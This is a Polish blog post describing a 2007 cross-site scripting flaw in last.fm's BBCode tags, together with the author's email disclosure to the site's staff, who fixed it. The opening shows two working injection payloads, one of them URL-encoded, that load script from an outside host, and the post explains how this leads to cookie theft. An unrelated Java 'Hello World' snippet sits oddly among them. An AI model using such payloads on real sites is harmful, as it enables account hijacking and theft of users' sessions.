Jeszcze przed wakacjami last.fm byl podatny na taki atak (lamania wiersza tylko dla czytelnosci):
[font=inherit;display:none;-moz-binding:
url('http://rotflcopter.rip3k.com/xssmoz.php#xss');][/font]
[font=inherit;background-image:url(javascript:
eval('%76%61%72%20%61%3D%64%6F%63%75%6D%65%6E%74
%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%22
%73%63%72%69%70%74%22%29%3B%76%61%72%20%78%78%3D
%61%2E%73%72%63%3D%22%68%74%74%70%3A%2F%2F%72%6F
%74%66%6C%63%6F%70%74%65%72%2E%72%69%70%33%6B%2E
%63%6F%6D%2F%6C%6F%6C%66%72%2E%70%68%70%22%3B%76
%61%72%20%79%3D%61%2E%74%79%70%65%3D%22%74%65%78
%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3B%76%61
%72%20%78%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74
%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D
%65%28%22%68%65%61%64%22%29%5B%30%5D%2E%61%70%70
%65%6E%64%43%68%69%6C%64%28%61%29%3B'));][/font]
public class Hello {
public static void main(String[] args) {
System.out.println("Hello World!");
}
}
Pierwsza linijka byla przygotowana dla przegladarek na silniku gecko, druga dzialala na ie oraz operze. Byla to luka pozwalajaca na CSS injection, z ktorego dzieki specyficznymi dla przegladarek bugami mozna bylo zrobic Javascript injection. Stad juz krotka droga do przechwytywania ciasteczek i w rezultacie przejecia kontroli nad kontem.
oto dyskusja z obsluga
Bugs
11 wiadomości
| onetoseek@o2.pl <onetoseek@o2.pl> |
28 czerwca 2007 19:28 |
| Do: office@last.fm |
I have one simple question:
Where can I submit security bugs? I guess doing it on public forum
isn’t good idea.
|
|
| Russell Garrett <russ@last.fm> |
28 czerwca 2007 19:38 |
| Do: onetoseek@o2.plKopia: office@last.fm |
Please reply to me and I can handle them.Thanks,Russ Garrett
russ@last.fm
[Ukryto cytowany tekst]
|
|
| onetoseek@o2.pl <onetoseek@o2.pl> |
28 czerwca 2007 20:45 |
| Do: Russell Garrett <russ@last.fm> |
Hello,
I guess showing an example is the best way. Here’s my profile
http://www.last.fm/user/niteria/
Of course I’m not from Last.fm Staff and that Recent visitors panel
above shoutbox isn’t Last.fm feature. Now, if you entered my profile I
could’ve changed your password.
Ok, now more technical details:
You have bugs in some bbcode tags. As far as i remember it is [font],
[color] and [align] tag. That tags lets you enter some special
parameters after ‘=’. As I noticed nothing except reading parameter
until first white space character is done. Parameter is directly
copied into span’s style tag. Now css injection can be done. Only
condition for malicious code is that it can’t have some meaningless
characters. Ok, css injection may seem not dangerous at all, but most
used browsers (based on gecko engine or internet explorer engine) have
specyfic flaws. Gecko engine accept -moz-binding and ie simply
executes javascript if it is passed as an image. Connecting
information we have we can conclude that javascript injection can be
done. That’s what is shown on my profile. As far as I know that tags
are accepted in almost any place in Last.fm. Only exception is
shoutbox. As you can see that makes great risk to all users.
Regards,
niteria.2007/6/28, Russell Garrett <russ@last.fm>:
[Ukryto cytowany tekst]
|
|
| onetoseek@o2.pl <onetoseek@o2.pl> |
3 lipca 2007 19:03 |
| Do: office@last.fm |
Well, I feel like I’m being ignored. I sent bug report tu Russ, but I
didn’t get any reply.
It’s a serious bug and if you don’t fix it, somebody else can notice
it and make a bad use of it.
thanks in advance,
niteria.
|
|
| Russell Garrett <russ@last.fm> |
3 lipca 2007 19:06 |
| Do: onetoseek@o2.plKopia: office@last.fm |
I’m sorry, I get a lot of e-mail, I may have deleted it by mistake.
Could you please send it again?
Thanks,Russ Garrett
russ@last.fmonetoseek@o2.pl wrote:
[Ukryto cytowany tekst]
|
|
| onetoseek@o2.pl <onetoseek@o2.pl> |
3 lipca 2007 19:30 |
| Do: russ@last.fm |
|
[Ukryto cytowany tekst]
Please reply when you got this mail, otherwise I’ll keep spaming your mailbox.
[Ukryto cytowany tekst]
|
|
| Russell Garrett <russ@last.fm> |
3 lipca 2007 19:32 |
| Do: onetoseek@o2.pl |
Thanks, sorry for missing the e-mail the first time. I’ll respond
properly later.Russ
[Ukryto cytowany tekst]
|
|
| Bartosz Nitka <niteria@gmail.com> |
3 lipca 2007 19:53 |
| Do: office@last.fm |
|
|
| Russell Garrett <russ@last.fm> |
3 lipca 2007 20:20 |
| Do: onetoseek@o2.pl |
Nice hack :) we’ve just fixed it now, and we’ve given you a year’s
subscription too.Thanks again,
Russonetoseek@o2.pl wrote:
[Ukryto cytowany tekst]
|
|
| onetoseek@o2.pl <onetoseek@o2.pl> |
3 lipca 2007 21:39 |
| Do: Russell Garrett <russ@last.fm> |
| Thanks for subsciption, but this bug was worked out by two people and it would be not fair if only I get this subscription. My friend’s nick is maszok. I hope you can do that for our being honest.2007/7/3, Russell Garrett <russ@last.fm>:
[Ukryto cytowany tekst]
|
|
| Russ Garrett <russ@last.fm> |
4 lipca 2007 03:02 |
| Do: onetoseek@o2.pl |
Done :)
Russonetoseek@o2.pl wrote:
> Thanks for subsciption, but this bug was worked out by two people and
> it would be not fair if only I get this subscription. My friend’s nick
> is maszok. I hope you can do that for our being honest.
>
> 2007/7/3, Russell Garrett <russ@last.fm <mailto:russ@last.fm>>:
>
> Nice hack :) we’ve just fixed it now, and we’ve given you a year’s
> subscription too.
>
> Thanks again,
>
> Russ
>
> onetoseek@o2.pl <mailto:onetoseek@o2.pl> wrote:
> > ———- Forwarded message ———-
> > From: onetoseek@o2.pl <mailto:onetoseek@o2.pl> < onetoseek@o2.pl
> <mailto:onetoseek@o2.pl>>
> > Date: 28-06-2007 20:45
> > Subject: Re: Bugs
> > To: Russell Garrett <russ@last.fm <mailto:russ@last.fm>>
> >
> >
> > Hello,
> > I guess showing an example is the best way. Here’s my profile
> > http://www.last.fm/user/niteria/
> > Of course I’m not from Last.fm <http://Last.fm> Staff and that
> Recent visitors panel
> > above shoutbox isn’t Last.fm <http://Last.fm> feature. Now, if
> you entered my profile I
> > could’ve changed your password.
> > Ok, now more technical details:
> > You have bugs in some bbcode tags. As far as i remember it is
> [font],
> > [color] and [align] tag. That tags lets you enter some special
> > parameters after ‘=’. As I noticed nothing except reading parameter
> > until first white space character is done. Parameter is directly
> > copied into span’s style tag. Now css injection can be done. Only
> > condition for malicious code is that it can’t have some meaningless
> > characters. Ok, css injection may seem not dangerous at all, but
> most
> > used browsers (based on gecko engine or internet explorer
> engine) have
> > specyfic flaws. Gecko engine accept -moz-binding and ie simply
> > executes javascript if it is passed as an image. Connecting
> > information we have we can conclude that javascript injection can be
> > done. That’s what is shown on my profile. As far as I know that tags
> > are accepted in almost any place in Last.fm <http://Last.fm>.
> Only exception is
> > shoutbox. As you can see that makes great risk to all users.
> > Regards,
> > niteria.
> > PS. Can talented under age php/c++ programmer work for Last.fm
> <http://Last.fm>?
> > Please reply when you got this mail, otherwise I’ll keep spaming
> your
> > mailbox.
> > 2007/6/28, Russell Garrett <russ@last.fm <mailto:russ@last.fm>>:
> >> Please reply to me and I can handle them.
> >>
> >> Thanks,
> >>
> >> Russ Garrett
> >> russ@last.fm <mailto:russ@last.fm>
[Ukryto cytowany tekst]
|
|
~ - autor: niteria w dniu wrzesień 7, 2007.
Napisane w hacking, lastfm
Dodaj komentarz